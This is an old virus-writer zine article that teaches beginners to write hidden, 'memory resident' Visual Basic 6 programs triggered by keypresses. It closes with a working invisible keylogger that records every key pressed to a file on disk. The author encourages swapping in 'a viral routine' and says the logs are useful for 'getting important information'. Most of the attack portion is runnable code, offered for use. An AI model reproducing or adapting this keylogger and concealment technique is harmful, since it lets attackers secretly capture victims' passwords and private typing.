Infiltration of a Nation
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
Your First Basic 'Memory Resident' Code In Visual Basic 6 by alcopaul
Back in the good old days, if you code a memory resident virus, you're considered to be competent...
Most virus coders in the past realised that making a memory resident code will increase code's chance
of survival in the wild ... Almost all the viruses made were memory resident.....
Some programs compiled in visual basic 6 can become memory resident as long as you don't put unload me,
or click the x button in the upper right corner of your form..
module programs without forms to be loaded can't be memory resident coz they automatically exit..
Most of malicious codes (viruses/worms) nowadays do their thing in one-ply...
It means that when executed, they initialise, do its thing, the payloads and exit...
They just modify the registry, enabling them to run at start up or when executing some file formats,
overwrite valid files with their own codes, waiting to be executed and terminate themselves or just
reside in memory without recognising any event that will trigger themselves to run again...
my reference: AV sites..
Our task now is to make a functional "memory-resident" code.... Without further a do, let's get it on..
All codes can be memory resident..
And when our code achieved this (which we can easily do in vb6), our next mission is to identify
the events that will be recognised by our code and will make our code active or perform its routine again..
are you with me? Sorry, I'm fuckin' sleepy but all I want is to help you, budding vb coders,
so I'm still goin' on...
===================================
making our memory resident code
===================================
Start VB6, Choose Standard EXE
now we'll code a memory resident program that will display a message
Private Sub Form_Load()
Msgbox "Hello World!"
End Sub
Whalla! ... Here's owr first memory resident code .. When run, it will display a message box...
But you can still see the form, waiting to get terminated....
Just click the x in upper right corner if you want it to be terminated...
If you don't wanna see the form, click the form, go to Properties Window and set border style to none,
resize the form to its minimum..
when you rerun the code, it will display the messagebox but you won't see any form..
So the only way to terminate this is by alt-ctrl-del, end task, or findwindow/postmessage...
===================================
the events
===================================
A memory resident code is effective when it is able to recognise events and upon recognising the event,
it would do its tasks again ... Simple..
Many events are taking place in the pc .. File read, file open, internet connect, display text, key press etc..
There are so damn numerous and we'll just consider the event that will fit our knowledge base and that is obvious..
And that's key press..
Introducing GetAsyncKeyState API
=============================================================================================================================
*** Private Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer ***
description from www.vbapi.com
Platforms
Windows 95: Supported.
Windows 98: Supported.
Windows NT: Requires Windows NT 3.1 or later.
Windows 2000: Supported.
Windows CE: Requires Windows CE 1.0 or later.
Description & Usage
GetAsyncKeyState determines whether a certain key is currently pressed and whether that key has been
pressed since the last call to the function. This function fails if the thread calling it does not
currently have the input focus.
Return Value
If the function fails (if the current thread does not have the input focus), the function returns 0.
If the &H8000 bit of the return value is set, the key has been pressed at least once since the last
time the thread called GetAsyncKeyState. If the &H1 bit of the return value is set, the key is
currently pressed down.
Parameters
vKey
The virtual-key code of the key to check.
The virtual-key codes identify various virtual keys. Virtual keys mainly consist of actual keyboard keys,
but also include "virtual" elements such as the three mouse buttons. The virtual keys also include many
"keys" which usually do not exist at all! A key's virtual-key code does not change when modifier keys
(Ctrl, Alt, Shift, etc.) are held -- e.g., the 1 key has the same virtual-key code whether 1 or ! is pressed.
However, the numbers in the numeric keypad on the keyboard do have two different virtual-key codes:
one for when Num Lock is on, and another for when Num Lock is off. Note that the virtual-key codes
of 0-9 and A-Z equal their ASCII codes.
=============================================================================================================================
This API is commonly used in any keyloggers, right trojan mastahs? I was once fascinated with keyloggers
and I don't know how to get start with programming any..
So I went to planet source codes, scanned the samples and I found a code with this API..
Using GetAsyncKeyState is so simple and you can code a working keylogger with just a few lines..
Ok? Code ripping? You may say that but I'm just putting the code into good use...
Now let's code...
Preliminaries:
Add timer to your form..
Click the timer box, then be sure to set the interval...
Make your form invisible by doing the steps: Click the form, go to Properties Window and set border style to none,
Resize the form to its minimum..
===================
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Timer() <------------ Interface with timer... Important
On Error Resume Next <---------- Error Handling Not Allowed
Dim keystate as Integer, scancodes as Integer
For scancodes = 1 to 254 <------------- all the possible keys in keyboard
keystate = GetAsyncKeyState(scancodes)
If keystate = -32767 Then
'personalised routine here
End If
Next
End Sub
===================
Our skeleton routine is finished..
Now we'll make it recognise the event that will trigger the execution of the code that we want to be executed
Let's look below.. I must say that the data there is incomplete... I just made it...
=============================================================================================================================
table hex 1.1
=============================================================================================================================
*************** Key Hex
***************
*************** Esc 1B
*************** F1 70
*************** F2 71
*************** F3 72
*************** F4 73
*************** F5 74
*************** F6 75
*************** F7 76
*************** F8 77
*************** F9 78
*************** F10 79
*************** F11 7A
*************** F12 7B
*************** RKey 5D
*************** Lock 90
*************** Insert 2D
*************** Home 24
*************** PgeUp 21
*************** PgeDown 22
*************** End 23
*************** Delete 2E
*************** `~ C0
*************** 1! 31
*************** 2@ 32
*************** 3# 33
*************** 4$ 34
*************** 5% 35
*************** 6^ 36
*************** 7& 37
*************** 8* 38
*************** 9( 39
*************** 0) 30
*************** -_ BD
*************** =+ BB
*************** Bckspce 8
*************** Tab 9
*************** q 51
*************** w 57
*************** e 45
*************** r 52
*************** t 54
*************** y 59
*************** u 55
*************** i 49
*************** o 4F
*************** p 50
*************** [{ DB
*************** ]} DD
*************** \| DC
*************** Cpslock 14
*************** a 41
*************** s 53
*************** d 44
*************** f 46
*************** g 47
*************** h 48
*************** j 4A
*************** k 4B
*************** l 4C
*************** ;: BA
*************** '" DE
*************** Enter D
*************** Shift 10
*************** z 5A
*************** x 58
*************** c 43
*************** v 56
*************** b 42
*************** n 4E
*************** m 4D
*************** ,< BC
*************** .> BE
*************** /? BF
*************** Ctrl 11
*************** WinKey 5B
*************** Space 20
*************** left 25
*************** up 26
*************** right 27
*************** down 28
*************** lclick 1
*************** rclick 2
=============================================================================================================================
We'll select the hex representation of the key so if that key is pressed, it will trigger
the execution of our routine...
i.e. Enter
We want to execute the routine (i.e. displaying message box) whenever Enter is pressed..
Now let's add some codes to the skeleton...
===================
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Timer()
On Error Resume Next
Dim keystate as Integer, scancodes as Integer
For scancodes = 1 to 254
keystate = GetAsyncKeyState(scancodes)
If keystate = -32767 Then
'the routine
If Hex(scancodes) = "D" Then
MsgBox "Hello world!"
End If
'eotheroutine
End If
Next
End Sub
===================
Now we're finished .... Just run this code and everytime enter is pressed, the msgbox will appear....
Fun? Yeah..
So we're finished making our first effective memory resident code..
You can replace the msgbox with a viral routine and you can also add another key event trigger routine to the code...
It's simple as 123
======================================================
Bonus: A keylogger
======================================================
Use the skeleton...
Preliminaries:
Add a textbox to your form..
Click the textbox .. Go to window properties .. Be sure to empty the text... Then set the locked option to true..
You can make the textbox invisible by setting the visible option to true...
Make your form invisible by doing the steps: Click the form, go to Properties Window and set border style to none,
Resize the form to its minimum..
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Timer()
On Error Resume Next
Dim keystate as Integer, scancodes as Integer
For scancodes = 1 to 254
keystate = GetAsyncKeyState(scancodes)
If keystate = -32767 Then
Text1.Text = Text1.Text & "-" & Hex(scancodes)
If Len(Text1.Text) = 3000 Then
Open "c:\keypressed.txt" For Output As #1
Print #1, Text1.Text
Close #1
Text1.Text = ""
End If
End If
Next
End Sub
::: Few words from me: Scancodes is set from 1 to 254 so it will be recorded to Text1.Text everytime
every possible keys are pressed ... Why should we convert scancodes to Hex? So it will be easy to read...
Converting it to Chr isn't practical coz special keys such as shift, ctrl etc. return unreadable strings
(a square) ... Then if Text.Text is equal to 3000 bytes, it will be recorded in a txt file..
This text file are the keys that were pressed ... It is beneficial in getting important information..
Period .. If you wanna analyse text file, just refer to the table hex 1.1..
So that's all for now ... I hope I did help in some way...
until then,
alcopaul
[rRlf]
03/22/2k2
rehashed
music: goldfinger, rancid, bob marley, sex pistols, the clash, sublime